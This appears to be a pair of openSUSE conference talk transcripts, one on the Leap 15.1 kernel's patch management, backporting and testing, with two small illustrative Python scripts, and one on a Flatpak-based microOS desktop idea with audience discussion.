I'm Takashi. I've been working on the kernel for a long time, and I'm still working on kernel stuff, so this year my talk is again about the kernel. This is the outline of my talk today. First I will start by clarifying some myths, followed by what's new in the Leap 15.1 kernel, then go into the openSUSE kernel development process, and finally show how things get fixed and how things get tested. The first topic is about clarifying myths. That is basically a kind of FAQ about our kernel, about openSUSE Leap and SUSE Linux Enterprise. One of the common questions is: are the Leap and SLE kernels identical? Well, yes and no. Yes, both packages are built from the very same source tree. However, the SLE kernel and the Leap kernel have major differences in binary form. First of all, the kernel configurations are completely different between the two: the SUSE Linux Enterprise kernel has a reduced kernel configuration, while openSUSE Leap enables almost all features. The SLE kernel is split into two packages, one with supported and one with unsupported modules, while Leap has only one package that contains everything. Both packages are built in different build environments: IBS, the internal build service, versus OBS, the Open Build Service. And the SLE kernel supports live patching via kGraft, while openSUSE Leap doesn't provide that yet. So although they are built from the very same source tree, the resulting binary packages are quite different. And maybe this is the most commonly asked question: the openSUSE Leap 15.1 kernel is based on 4.12, which is very, very old. Yes, it's old. Actually, looking at our history, openSUSE Leap takes relatively old kernel bases: openSUSE Leap 42 took the 4.4 kernel base, and openSUSE Leap 15.0 and 15.1 are based on the 4.12 kernel. That's correct. However, we took a really huge amount of patches on top of that. For openSUSE Leap 15.0 we already carried 22,000 patches on top, and now, guess what, for 15.1 it is 46,000, so almost 50,000 patches on top. That's why it is no longer a 4.12 kernel. It is a kind of Ship of Theseus, the famous thought experiment: this is no longer the original 4.12, it contains so many different components on top. And is the Leap kernel stable? In that case the answer is yes. Actually, this is the very reason why we take that old kernel code base. Another point about stability is that we guarantee, as a kind of promise, a consistent kernel ABI. That means if you build a kernel module package once, then this package keeps working with all kernel updates of the same version. We also do proactive backporting of fixes from several trusted sources, and we run CI and QA testing regularly on the kernel. So let's continue to the next topic, what's new in 15.1. As I said, there are many changes in the 15.1 kernel. This is a table showing which top-level directories in the kernel contain the changes, and as you can see, the majority of changes have been made to the drivers: an astonishing share of over 86 percent of the source code changes. In the end we had almost five million lines of changes, and about 86 percent of that is drivers.
And this is not surprising, because in general it is the device drivers that tend to have lots of code changes, while the important changes, like the memory management core or the file systems, are small in the amount of changed code but still important. And for the Leap and SLE kernels we are fairly conservative: we don't touch the core parts too intensively, while we backport many things to support the new features of new machines and new systems. That's one of the reasons we get these statistics. So, 15.1. Let's start with the server side. We had, as you can guess, many storage, file system, block layer and network updates. Most of the recent SCSI drivers have been updated, and one other interesting thing is NVMe over Fabrics, which is required for NetApp stuff; there we caught up with upstream. The file systems also got a bunch of updates, especially Btrfs, our default file system, and also XFS and ext4. This time we got a bunch of bcache updates, and MD RAID, Ceph and CIFS. In the block layer, I think we still didn't switch the default to multi-queue, but we got updates to the most recent code for blk-mq, and that includes the BFQ I/O scheduler. And networking: of course the network core has been updated, and for Ethernet, Broadcom, Cavium, Chelsio, well, you name it, most of the vendors have been updated. For desktop usage, first of all there are the video drivers, the DRM stack updates, where we raised the whole code to the 4.19-or-later state. That is really a lot of changes, about 20% of all the changes. Also the Wi-Fi drivers: we updated almost all the Wi-Fi drivers and the Wi-Fi stack to 4.19-plus. Storage, MMC and SD have been updated. And the sound drivers, that's my area, so I upgraded the whole HD-audio and USB-audio code to 5.0 or even 5.1. Then buses, platforms and so on: we got a Thunderbolt update, PCI hotplug, and a little bit of FPGA. TPM 1.2 and 2.0 things, the RDT memory bandwidth allocation stuff, hardware crypto, and x86 WMI, which is for laptops and desktops. Virtual machines: KVM and Hyper-V have been updated. Security: AppArmor. Another interesting thing is AMD SEV, that is Secure Encrypted Virtualization, I think; I forget what the acronym stands for. Tools like perf and BPF have of course been updated. And architectures: for x86 we added support for the recent Intel and AMD chipsets, like, I forget the names, Whiskey Lake, Amber Lake, and AMD Ryzen Zen 2, Zen 2 just a little bit. For ARM64 there are so many changes that I cannot list them; if you have a question, Matthias Brugger is here and he can answer. Or if something is broken, it's because of his updates. For 32-bit ARM we didn't have many updates, only occasional fixes backported from the trusted stable tree. And 32-bit ARM is provided only for Leap; it is not for SUSE Linux Enterprise. On the other hand, PowerPC64 and s390 are mostly for SUSE Linux Enterprise and they also got updates; I think we also provide those architecture packages in openSUSE Ports. So let's continue with the SUSE kernel development and how that happens. Not surprisingly, we manage it in Git. Yes, of course, everything is in Git.
And what is different in the SUSE and openSUSE kernel source management compared with other distributions is that we keep all code changes as individual patches instead of applying them to a kernel git tree. The kernel-source repository contains patch files, patch after patch, and they are applied dynamically when building the package, just like quilt. The series.conf file contains the list of patches, so which patch is applied first and so on, and the repository contains the patch files themselves. When you look at the kernel source package, you can find that over 97% of the patches are from upstream, meaning the upstream kernel tree. That is the result of us really trying hard to push the upstream-first rule: we basically accept only patches that are upstream or that will be upstreamed. A recent change in the development process is that we now apply sorted patches. What are sorted patches? It means we apply the patches in the same order as the upstream tree. Suppose upstream had changes A, B and C; then we apply patches A, B and C in that order, and that's all, that is sorted patches. For example, if we had patches B and C applied first and then found out that patch A is missing, we don't apply them as B, C, A; instead we reorder to A, B, C. So we always reorder the patches to follow the upstream topological order. Why do we do that? Because by keeping the sorted order, each patch stays closer to its original form, and that has the big merit of making backports easier and cleaner. It also makes it easier to catch backport mistakes: you can simply compare the backported patch with the original commit. So, how do you expand the patches? We have 50,000 patches, as I said, and that can take a really long time. If you run quilt over these 50,000 patches, I measured it, it takes six hours on this machine. Six hours of patch application time is not good for the daily job: in the morning you start applying the patches, and by the time it's done the day is over. Good job. It can actually be faster. We already have a script called sequence-patch, which applies the patches just like quilt but in an optimized way, and that takes nine minutes 25 seconds for the 50,000 patches. Faster, yes, but it still takes time. But there is a trick: the script has a fast mode. The problem with the previous approach was that the script invokes the patch program for each patch, so patch is executed 50,000 times, and that takes a lot of time. In fast mode, instead, we gather all 50,000 patches into a single patch file and feed that to the patch program once. That takes 80 seconds. Good. The drawback of that approach, however, is that you cannot roll back to the patch that failed to apply. Is there a better way? Yes, there is. Recently Michal developed a program called rapidquilt. It is written in Rust, it applies the patches in parallel, and it also supports rollback at a patch failure. With that program on my 8-core machine it takes only three seconds to apply the 50,000 patches instead of six hours. That's really awesome.
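To make the series.conf mechanism above a little more concrete, here is a minimal sketch of what expanding such a patch queue conceptually looks like. This is not the real sequence-patch or rapidquilt code, and the repository and tree paths are placeholders; it only shows the idea of reading an ordered patch list and applying each entry with patch -p1.

```python
#!/usr/bin/env python3
"""Toy illustration of how a kernel-source style patch queue is expanded.

NOT the real sequence-patch.sh or rapidquilt: it just shows the idea that
series.conf lists patch files in (upstream-sorted) order, and they are
applied one by one on top of an unpacked vanilla tree.
"""
import subprocess
from pathlib import Path

REPO = Path("kernel-source")   # hypothetical checkout of the patch repository
TREE = Path("linux-4.12")      # hypothetical unpacked vanilla kernel tree


def read_series(series_file: Path):
    """Yield patch file names, skipping blank lines and comments."""
    for line in series_file.read_text().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        yield line.split()[0]


def apply_patch(tree: Path, patch_file: Path) -> bool:
    """Apply one patch with -p1 inside the tree; return True on success."""
    with patch_file.open("rb") as fh:
        result = subprocess.run(
            ["patch", "-p1", "--no-backup-if-mismatch", "-d", str(tree)],
            stdin=fh,
        )
    return result.returncode == 0


def expand(repo: Path, tree: Path) -> None:
    applied = 0
    for name in read_series(repo / "series.conf"):
        print(f"applying {name}")
        if not apply_patch(tree, repo / name):
            print(f"FAILED at {name}; {applied} patches applied before it")
            return
        applied += 1
    print(f"done, {applied} patches applied")


if __name__ == "__main__":
    expand(REPO, TREE)
```

The real tooling is of course much smarter: rapidquilt parses and applies hunks in parallel and can cleanly roll back a failed patch, but the input it consumes is exactly this kind of ordered list from series.conf.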
Then there is the SUSE kernel git tree. It is publicly available; you can look at it on kernel.suse.com at any time. This tree contains several branches, and each branch represents, so to say, a product: like SLE15, openSUSE-15.0, openSUSE-15.1, and also Tumbleweed, which is taken from the stable branch that tracks the upstream stable kernel. There is also master, the head, tracking the upstream tree, currently 5.2-rc1. And there are vanilla and linux-next branches that automatically fetch from the upstream git; those are just for testing. The git workflow is, yeah, kind of GitHub-like, a normal git workflow: each branch maintainer takes pull requests from the developers and merges them after integration tests and review. There is a kbuild bot running that tests the builds and also does sanity checks, like whether the patches apply cleanly or whether something wrong is contained, and so on. If everything is okay, the bot says yes, this branch can be merged, and then it gets reviewed and merged. One thing to note is that some branches are shared by other branches. For example, SLE15 is shared by many other branches and is automatically merged into them: the SLE15 branch is merged into SLE12-SP4, SLE15-SP1 and SLE12-SP5, and openSUSE-15.0 is derived from SLE15, and so on. For users and developers, one good thing to know is the kernel of the day. I would really recommend remembering this. It is a kernel package built from the very latest state of the git branch, and in OBS it is updated daily: every day it fetches the very latest git repository and rebuilds the package. The OBS Kernel:SLE15 project, and the other Kernel: projects, contain that kernel-of-the-day package. Why is this good? Because you can install the kernel-of-the-day package from other branches too. That means if you have a brand-new laptop that openSUSE Leap 15.1 still doesn't support, you can install the openSUSE Tumbleweed kernel, or the very latest one from the kernel stable tree. Or if you have a regression after upgrading to openSUSE Leap 15.1, you can just install the older kernel on top of your 15.1 system and see whether the problem goes away with that; if yes, then it is a kernel regression in 15.1 and you can report it, and then we look at what changes were made, and so on. One thing to note is that you should increase the multiversion limit in zypp.conf beforehand; by default I think you can install only two or three kernels on the system, but I usually increase that number to five or six. So, bug fixes. As I said, for Leap and openSUSE in general we backport fixes by hand, and usually we take a backported fix from an upstream commit. How do we find such a fix? Nowadays kernel developers are supposed to add a Fixes: tag if a commit is supposed to be a regression fix. And there is a script called git-fixes: this program can scan the upstream changes and report which commits may fix a bug that is present in our kernel. That is one way to find fixes from upstream. Another way is to look at the stable kernel trees: currently 4.14 and 4.19 are the long-term support kernels, and git-fixes can look at those too and see which commits are missing that possibly fix a problem. And if you have a problem, then of course you can report it in the openSUSE Bugzilla, or we take a look at the upstream bug trackers too.
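As a rough illustration of what a git-fixes style scan does, here is a hedged sketch, not the actual git-fixes tool: it walks an upstream revision range, extracts Fixes: tags, and flags commits that fix something already carried in the backported set. The repository path, revision range and the hard-coded commit hash are purely illustrative.

```python
#!/usr/bin/env python3
"""Hedged sketch of a git-fixes style scan (not the real tool).

Idea: an upstream commit carrying a "Fixes: <sha> (...)" tag is interesting
for us if the commit it fixes is one we already carry in our tree.
"""
import re
import subprocess

FIXES_RE = re.compile(r"^Fixes:\s*([0-9a-f]{8,40})", re.IGNORECASE | re.MULTILINE)


def upstream_commits(repo: str, rev_range: str):
    """Yield (sha, message body) for each commit in rev_range of the clone."""
    out = subprocess.run(
        ["git", "-C", repo, "log", "--format=%H%x00%B%x01", rev_range],
        capture_output=True, text=True, check=True,
    ).stdout
    for record in out.split("\x01"):
        record = record.strip()
        if not record:
            continue
        sha, _, body = record.partition("\x00")
        yield sha, body


def candidate_fixes(repo: str, rev_range: str, backported: set):
    """Return upstream commits whose Fixes: tag points at a commit we carry."""
    hits = []
    for sha, body in upstream_commits(repo, rev_range):
        for fixed in FIXES_RE.findall(body):
            # Fixes: tags usually use a 12-character abbreviation, so compare prefixes.
            if any(b.startswith(fixed[:12]) or fixed.startswith(b[:12]) for b in backported):
                hits.append((sha, fixed))
    return hits


if __name__ == "__main__":
    # Hard-coded for illustration only; in practice this set would be built
    # from the Git-commit: tags inside the patches.* files of kernel-source.
    backported = {"0123456789abcdef0123456789abcdef01234567"}
    for sha, fixed in candidate_fixes("linux", "v4.12..v4.19", backported):
        print(f"{sha[:12]} may need backporting (fixes {fixed[:12]})")
```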
And now something new: we have a lightweight CI test for the kernel. It is running hourly on my desktop: it fetches the git tree, and if something changed, it runs the tests. It tests in KVM, boots to the desktop and also does suspend/resume testing. There are different images built with different file systems, and also legacy boot and different QEMU graphics backends. That sometimes helps to catch a regression as early as possible. Another new thing is that we deployed openQA tests for the kernel of the day. Thanks to the QA team, they take certain branches, currently SLE15, SLE12-SP4 and something else, and they test the kernel of the day, so basically every day. It is openQA, so it is currently limited to virtual machines, and the test scenarios are also limited, currently only LTP. So that's basically all my topics. The resources are kernel.suse.com and the OBS repositories, so if you want to find something, you can take a look there. Okay, that's all. Any questions, or bashing of the kernel package, or anything else? Hi. It's not directly a question, more of a comment. As an openSUSE community, I think we should think about how to handle feature requests for the openSUSE Leap kernel. In openSUSE we use this kernel, which I think makes a lot of sense because of its stability, but we sometimes had the problem that afterwards someone came and said: hey, this driver or this peripheral is not working, this is a bug. And we had to tell them: no, we can't add this driver now, because the kernel is already closed. So I think we need to formalize, in some way, the possibility for the community to create feature requests against the Leap kernel to get their needs included. Yeah, thank you, I very much agree. We used to have openFATE in the past, but it was discontinued, I think. So the current way to request something for openSUSE Leap is either to open a bug and report it there, or to ask on the opensuse-kernel mailing list, or opensuse-factory; opensuse-kernel is probably better. But yes, it would be better to have some more formal way, because we want to track the feature request itself. But I think that is maybe beyond my hands. Good. Okay. Thank you. Thank you for that.
The saga continues: after the legendary Leap 42.3 trilogy, we entered a new era of Leap 15.x. This talk will look back over the Leap 15.0 kernel and the ongoing Leap 15.1 kernel development: which new features arrived, how they are managed and how they are processed.
10.5446/54417 (DOI)
Okay. To me again, different slide template this time, and actually a bit of a different presentation. Even though I'm talking about microOS, this isn't Richard the future technology team member where we work on microOS at SUSE. This isn't Richard the open SUSE chairman talking about this. This is Richard the crazy contributor who still just sometimes does weird stuff. In fact, so it's not official. This isn't like some future open SUSE plan unless we turn this into some future open SUSE plan. In fact, when I originally put this proposal in, the idea I had was I'm going to work on this crazy thing and Hackweek will have happened at SUSE. SUSE gives all of R&D a week to play on whatever they want. My assumption was Hackweek would have happened by now and I could talk about my Hackweek project at OSC. Hackweek is in three weeks' time, so I haven't done anything. But the session is still here. I decided to turn this into a bit more of a round table, a discussion session. Thing I say as I ramble on for the next half hour, so feel free to interrupt. Martin has a microphone, there's a microphone at the back. There's no script. Just like this idea is a construction site, this presentation is a construction site. Let's see where we end up afterwards. All of you at my microOS talk an hour ago, most of you. Okay, good. Just need that because I don't have to repeat half of that then. The basic thing I've been asking myself lately is what the hell to do about the Linux desktop. I want to believe that this is possible someday. Because this is one of the reasons why I got into Linux, to use a Linux desktop, to have that be the thing that I'm doing my work on, that I'm playing around on, that I do my gaming on. But it hasn't happened yet. Even when it does happen, there are being frank, desktop Linux is out there that are more popular than openSuser. That shouldn't be, but they are. So I've been kind of thinking of what are the problems that are really holding the desktop Linux world back. And there's kind of the obvious easy ones to blame. The fact that there are multiple distributions is part of the issue. There's lots of choices out there. That means some people are going to pick Ubuntu, some are going to pick Fedora, some are going to pick us. That makes it kind of hard to coalesce behind this single desktop idea. But then that idea doesn't really fly anymore either. Because we're not in this single Microsoft Windows world anymore. People are gaming on Macs, they're gaming on Android, they're playing around and doing stuff on Windows. Hey, they're running Linux on Windows these days. The kind of diversity of options aren't what, I can't believe that is what's holding desktop Linux back. So what is? And the thing that kind of really hits me is the lack, well, the fact that I think we as communities typically target ourselves and use stuff that we want to use and use it the way we want to use it. So we end up geeking around in tumbleweed because we like playing with operating systems and we do all this deep and dirty stuff in the operating system. So we don't want a polished, sanitized environment, let's say, for example, like OSX, where you can't do any of that fun stuff. But then it's really easy to get that one application, dump it on OSX and run. It's almost like we're living in totally different worlds. And those worlds are diverging in some respects. 
We're doing all this weird geeky, fast moving stuff and you're seeing these platforms like Windows and like OSX, getting in some respects more and more locked down and limited. Or in other words, they're doing it wrong. And I think there's lessons to be learned from that. Maybe it's because I'm getting older as well, but I don't want to be spending all of my time messing around with my laptop to make it work the way I want it to. It's nice that I can. It's nice that I can get under there and I can play around with the drivers and the kernel and stuff. But I just want to have a desktop which boots up and gives me a desktop environment and then I can dump the applications on top. So I've been kind of thinking of what's the perfect sort of hybrid of that approach. And in my day job lately, I've been working more and more micro-S. So like I talked about earlier, micro-S now being best described as a single service operating system. So you deploy it, it does that one thing. What if that one thing is just a desktop? And what if that desktop was a traditional open-suzer desktop? So something like, for example, no. So I actually messed around with this two hack weeks ago, so 2017, where we weren't talking about micro-S as much. I called it cubic desktop, but played with the idea there. Basically what I took there was the cubic installer we had at the time ripped out the container part because I wasn't going to do this with containers. And installed GNOME using transactional updates. So you install the system, you install transact, you install GNOME with, yeah, I think it was PKG in GNOME patterns, reboot. And I had a fully working GNOME desktop, even though it was a read-only root file system. So I couldn't mess around in anything in USR. I couldn't mess around with much in VAR because that was broken at the time. But the operating, the basic operating system worked perfectly fine. And it reminded me a lot of what you see on like a Chromebook now, where you didn't have to bother about messing around with the packages of the files, just messing around with too much of the configuration. It's just there. It just works. And then I messed around with the time Flatpak, like FlatHub had just launched. So I was using Flatpak to install my various different applications on top. And the idea was really cool. Basically the operating system part worked fine. It booted perfectly fine. It patched perfectly fine. I went to about three or four weeks of TumblrWeet snapshots. And at no point did anything ever go wrong. It always booted perfectly fine. It always got to the desktop fine. And besides the core Nome applications, things like the control panel and the terminal, there was not a single application on the system because I was using the basic Nome pattern for TumblrWeet. So I had to install apps from Flatpak. And about 35% of them worked, and the rest of them didn't, because at the time Flatpak was rather broken. But the general idea of Flatpak is a relatively good one. Not the best in the world, but basically taking this idea of a container, or a container like a RAM, which is a sandbox application. Having that sandbox application run, but unlike app image or other arrangements, you don't necessarily have the application and all of its dependencies bundled together in one single big blob. Because then you'd end up with all these applications being three or four gig in size. Because they basically have a mini operating system for every single app. 
With Nome, with Flatpak, you basically have these runtimes which are sandboxed containers full of the libraries that you're going to need for these various ecosystems that we have already in the Linux world. So like with KDE, there's a KDE runtime, there's a Nome runtime, there's an NVIDIA driver runtime. So basically remodeling what we currently do in RPMs into these sort of more globby groups, but these groups are the groups that people care about when it comes to desktop applications. Flatpak is very desktop application-oriented, which is one of the reasons why I'm still liking it more than, let's say, Snap with Ubuntu, where they've basically just reinvented packaging and created all of the problems we have with RPM and solved none of the problems we have with RPM and made some more issues because it's Ubuntu. Because Flatpak really from a desktop side does solve or does at least model the problem the way a desktop user thinks of the problem or way a desktop developer thinks of the problem. So basically you're developing an app on Linux now. If you're using a Nome stack, I can totally see Flatpak being the first thing they're going to expect. Because the runtimes are there, it's being handled by upstream Nome, build it, test it, ship it, all in GitLab because they've already pipelined all of that. And we're still doing our RPMs, but should we? Does it really make sense for OpenSuser to take upstream Nome's RPMs, upstream Nome's source, and build it again, test it again, ship it again just so we can say we've given you the desktop app? Our desktop apps really are core competency. We're really good at doing operating systems. But the desktop app, we typically just ship it, test it, check it in OpenQI and do it. The open question I have with this is basically can we make a whole bunch of problems we have with OpenSuser just disappear by offloading it to what's already happening upstream with Flatpak and Nome, for example? And then if it doesn't work out as well as it should, actually contributing. So after this all went horribly wrong, and I wrote this blog post and I said how horribly bad Flatpak was. I did feel a little bit guilty. So I went to Gwadek and I started talking with them. Basically we worked through most of the issues that were the root cause of these massive breakages. I haven't solved all of them, but the team there really have changed their build processes, they're testing things an awful lot more. I don't think they're using OpenQI despite my best efforts, but the quality of Flatpak has been improving. So yeah, I'm starting to get more comfortable with the idea of using Flatpak as the main way of delivering applications for my desktop. I don't know if it's going to be perfect, this is why, this is a hack week idea, I want to try this and see how far it goes, see where it goes wrong. And with that I kind of realized that I don't really know what I'm doing with a lot of this stuff. It's been a really long time since I've actually contributed directly to Nome, because I used to be in the Nome team, I'm in the Nome team, I used to package it all there, but it's moved on since 3, 2, which is the last time I packaged it heavily. And so with this idea I want to kind of see where the world currently is, and if anybody is really interested in this idea, what needs to be fixed where? Is this something where we need to fix OpenSuser to be more accommodating for Flatpak? 
Is this something where Flatpak just really do not know what they are doing and they need to learn how to build stuff properly, at least from an OpenSuser perspective? In which case, do we need to look at OBS, for example, building Flatpak better, or being part of that ecosystem there, or making things more complicated by doing things alongside it or the like? And nobody has interrupted me yet. Does anybody have any questions at this point? Still looking confused? No? Okay. Go on. My question would be, how would you solve the kind of the meta-packaging? You organize things into the right level of granularity, and how do you choose things that people actually want to have together? Is it your selection? Is it you provide a lot of fine-grained selections? Then how do you find things? It's the same problem you have with a bunch of RPMs, but it's one level up. Yeah. Well, it may be my naive approach, but when thinking like a modern, basic user, like with a phone or a tablet or a Chromebook, what do you get when you boot that thing up for the first time? You basically get the desktop or the UI, and a handful of basic applications, and the thing is pretty useless. Besides those basic applications, that kind of core functionality, you're on your own after that point, and then you're going to the app store or whatever and downloading everything individually that you want. So the idea I'd explore with this is would it make sense for the micro-S desktop, for example, to have nothing but micro-S, GNOME, maybe a subset of the GNOME applications to kind of give you that basic environment? So those would still be RPMs, and those would still be the traditional open-suzer stuff. And then from that point, we just say you're on your own, and using their flat-pack snaps or whatever, putting everything on top of that. Yeah, kind of go the sort of long-tail approach. That's where I, yeah. Which, yeah. What does anybody else think of that? There we go. Yeah. So I'm trying to compare this with the macOS world or the iOS world or Android, Chrome, whatever. In general, I think the basic model, take the OS, make the OS basically one big blob that is updated atomically, works really well. And Tumbleweed gives me a very similar experience to what I see on an iOS where I can trust the update and sometimes if it breaks, okay, next day there's a new one and it will fix that one breakage. That's all fine. And then everything else is an app store and you can get things from there. I don't think you necessarily have to make that core OS so small. If you, let's say, why not ship all the default apps as part of that, like Apple does it? You get a shitload of applications as part of the OS update. Because I mean, we are doing it well. I mean, those packages work in Tumbleweed. But yeah, everything that, you know, where you want to grow a community, want to have other people contribute, I think such an app store approach or, you know, a centralized build service where you can just put this stuff up and maybe it's untrusted, but, you know, they'll take care of distributing it. Makes perfect sense. The thought I have with that, one of the reasons I want to, well, there's two reasons why I want to push that bar, make the OS part as small as possible. One is like the thing I was talking about with micro s earlier, is the, with micro s being transactionally updated, you know, any update on that OS layer is going to need a reboot, which is a bit inconvenient. Plus, that's your scope of risk. 
That's the part where if that goes wrong, your system is not booting, things are broken, etc. So with micro s, we have lots of nice features for automatically rolling back if stuff goes wrong. So with this, I would see a model where you, you know, have it set up to automatically check is GNOME booting, has X, DM started properly, blah, blah, blah. If it doesn't, it would be better than Tumbleweed is because it would auto roll back and you would be on the previous snapshot. But that means if we put way too much stuff in there like LibreOffice, for example, even though our LibreOffice package is really, really good, you know, you're increasing that risk of introducing something that's going to break in that OS update. So there's, you know, I want to minimize that risk of breakage. At the same time, the question I kind of mentioned earlier of, you know, are we, is OpenSuser creating more work for itself than it needs? Do we really need to package LibreOffice? And I know that's a controversial question. And I'm not saying the answer is no, but I want to kind of use this as an excuse to kind of see if there is a yes to that question. Maybe we don't need to package LibreOffice and all these desktop apps. Maybe it's better to leave it in sort of the flat pack world and we just focus on the OS plumbing parts that, yeah, where people can't, we can't trust what random upstream stuff is actually giving us, maybe. Yes, sorry. Yeah, no problem. What I really like about this idea is if you do a cost benefit analysis of the amount of time that goes into integrating desktop packages currently and the amount of little glitches and stuff you have to fix every time upstream comes with a new version, that's an incredible amount of time that's not being spent on hardening the core operating system or making that more reliable. And from a security point of view, I am incredibly in favor of sandboxing any user-facing application anyway. As soon as I've done brilliant with UpArmor in the past, it's been one of the more usable hardening tools so far. For my point of view, if you just focus on stabling the core operating system instead of, well, in my opinion, misaligning time, fixing glitches in the front-end that will exist regardless of you batching at this round, I'd be much happier, especially also if you enable users to install their own apps like from flat pack. I think most here in the audience will recognize the pain in the, let's say, backside that is handling your mother-in-law's computer. If you could give her at least a little bit of freedom herself, that saves you all those Sunday afternoon trips backwards and forwards, which is also quite nice, although I even like my mother-in-law, but still. So yes, from my point of view, please carry on this route. This is basically whatever made Android the go-to platform on mobile, and even though they're doing a piece for your benefit, so please do it, right? And yeah, kudos for trying this. I'm maybe betraying my ignorance about flat pack here, but won't this end up with a lot of duplication of all your libnome, whatever, that is then in distributed multiple times in each pack, both on disk and in RAM, or is there now some kind of deduplication? The one reason I like flat pack more than some of the other options. 
So, for example, there are other options for the application provider, like AppImage, which you can actually build in OBS and which can likewise be sandboxed, or Snap. Flatpak has this model of the application and its runtimes, and the idea is that there is a one-to-many mapping between them. So if you are building a GNOME application, it is going to require the GNOME runtime, and that GNOME runtime should be the only place where there is, for example, a GNOME library. An application might require a couple of different runtimes, and I think they also have runtimes requiring runtimes now, just to make things fun. So there should be less of that duplication than you could potentially have with a containerized approach. It is still less efficient than what we are used to in the RPM world, because, as happens with every major GNOME release, there is GNOME 3.20, there is 3.30, 3.32, and if you are using Flatpak apps you are likely to have a mix of GNOME 3.30-based apps and GNOME 3.32-based apps. Then you have both runtimes, and compared to a typical GNOME openSUSE installation in Tumbleweed right now, that is something like twice as much disk space. I mean, it's not lightweight. But disk space isn't that expensive these days, and maybe that is a better model at least; heck, it's what our phones are all doing already. And the second question: do you have an idea how to handle integration where, say, an application depends on some services provided by GNOME, like, I don't know, Folks or other things on the bus that it expects the platform to provide? Flatpak has an API for that, whose name conveniently just shot straight out of my head. Portals, that was it. Yeah, portals. There are effectively portals plugged into GNOME which provide sort of an API gateway for that kind of thing. The first one was the file browser portal, because otherwise you would have all these sandboxed applications where you click on file open and it loads the file view of the contained application, which of course doesn't have any files in it and can't see your home directory, and that's kind of useless. So the file portal gives you that route of looping through and being able to escape the contained area for that purpose. When I looked at it two years ago it was really limiting and really lousy, but in the time since then more and more upstream developers are adapting their stuff, so the upstream binaries include support for those portals; they are already doing this, they are already shipping the Flatpaks. And that includes things like D-Bus services. Okay, cool. Hey.
I'm not so big use of open-sueser, but I mean, I have kind of radical idea. I mean, as a Java programmer, I'm always working with the Java programs and the user applications, I mean, maybe at some point it makes sense to collaborate with other distros in producing Java-based graphical user applications where it makes sense. And otherwise, maybe it makes sense, as you say, to drop some packages where your production will be increased, I mean, in building. So you don't want to have overhead, but still, I mean, how many packages currently you packaging, maybe more than thousands? Yeah, so in open-sueser right now, I think we're about 12,000 or maybe a bit higher packages. In staging, though, do we have a little bit of a break? Are you here? No. How many packages? Does anyone know how many packages are in staging? I've forgotten. So many. It's a couple of hundred, but it's a couple of hundred of really big, nasty ones. LibreOffice takes longer to build than most of the rest of the distribution put together. So yeah, that's where kind of killing, dropping some of those other packages might help. So I think this probably would make sense, but I don't know when some middle-sized companies kind of depending that you include some packages, maybe it's better just ask around of your from community make a poll to make sure that you don't drop package, which kind of have critical dependency on the other side. That's why I'm here. That's my point. That's why I'm repeating all this stuff. People can watch the video. I am expecting the Flame Wars to start on the mailing list. It's all good. Let's have that discussion and see where we go with this. None of this is set in stone. I totally admit I have no idea what I'm doing. So yeah, that's fine. So first of all, a bit of a radical idea on the business side. I think we may want to just ask ourselves, is building those packages really what customers would want to see from us? Or would the customer just be fine if he said, okay, it's built upstream, but we'll still help you if it breaks and we'll help you through the upstream build systems and the upstream distribution. So in the end, we provide the same service. Be a happy camper with your LibreOffice or whatever the contract is. The other thing we've mentioned it like when the D-Bus interfaces and so on, the critical thing to get right really is what is the contract between the OS and the application stack? Because that's, I mean, if you look at the phone systems, for example, there's a huge API that those applications can use so they don't have to take care of any of the sensors, some of the magic going on like the AI for voice detection and so on. That's all basically a huge set of APIs that the OS provides. And that makes the applications relatively small. I mean, they're still huge because they bundle in a lot of stuff. So that's really if the GNOME ecosystem or whatever gets that right, there's a fair chance that a Linux desktop could be a nice platform just like iOS or whatever. And it could be in many cases just HTML5 web apps with some local storage and all you need is basically a Chrome runtime. So rough show of hands. How many of you here would be interested in trying to use this if it existed? Cool. And how many of you are willing to help make it happen? Cool. Okay. That's fine. Cool. Okay, then. Does anybody have any more questions, thoughts? If not, I'll guess I'll have to start a mailing list for at least you can pick up your hands up. Oh, there's one. Sorry. Hello? Okay. 
What I'd like to say is from a user point of view, what about stability and security of these flat-packed packages? That'll be something which we will have to look at. So the assumption that I'm going into with this is this is being handled by upstreams mostly. So the way the flat hub ecosystem has kind of evolved, they're encouraging upstream developers to contribute directly to flat-hubs. So it's not like the relationship we have right now where we package and it doesn't matter. It should be upstreams doing most of that in their right away. So in theory, it should be more responsive to security updates. Should be at a relatively good standard and relatively good quality. So if something isn't good enough, you get to moan directly to the developer. So that might be a good thing. I'm not saying it's going to be better than the current. That's something this will have to find out. And that's actually something I worry about too will be users' expectations with that. Right now, you download OpenSuser, you know who to blame when it doesn't work. It's OpenSuser's fault. As long as you're not pulling stuff from a random OBS project. If you're pulling stuff from a main path, it's our fault. With this split, how do we make sure users know who to turn to when it doesn't work? How do we stop our bugzilla getting full of stuff about someone else's application? There's also another point. I see right now, I see inexperienced users as a target because you just have an OS. You just need to install one or two applications. And experienced users also who have their 10th or 20th device and don't want to set it up again. This is something that I do not see yet. The way OpenSuser is set up right now, disappearing with RPMs and having the ability to install any package you want or uninstall it again, like it's right now. I'm not suggesting we change the world overnight. No, no, no. I can see a possible future where we start dropping packages because they don't make sense anymore. I can also see, perhaps more soon than that, a possible future where we could end up segmenting that kind of stuff away. Let's imagine four or five years from now, we've come together and produced this thing and it becomes more popular as a desktop than Tumbleweed or Leap as a desktop. There would still be Tumbleweed and Leap, and maybe there would still be Tumbleweed and Leap as a desktop, but the micro-S desktop is the big one of the family. When we reached that point, I could see us potentially doing some fancy stuff like moving those legacy desktop packages, building them differently, not having them as part of staging, because there wouldn't be a core part of the distro anymore, so therefore they wouldn't be slowing staging down, therefore we'd start getting some of those build time benefits and stuff. Yeah, see where the road goes, but I'm not expecting this to change everything in no way. I like even Tumbleweed too much. How would you address bugs for FlatPacks? How would you address bugs for FlatPacks for basically for the desktop? How would you address bugs? Yeah, because it's not an open SUSE. Yeah. Like I said, that's kind of an open question. I don't have a great answer to. This is one of the things I would look at while we're doing this. Like, you know, it's, I mean, if I remember correctly, I'm a little bit rusty with Nome software because I uninstalled it from this machine. Yeah. 
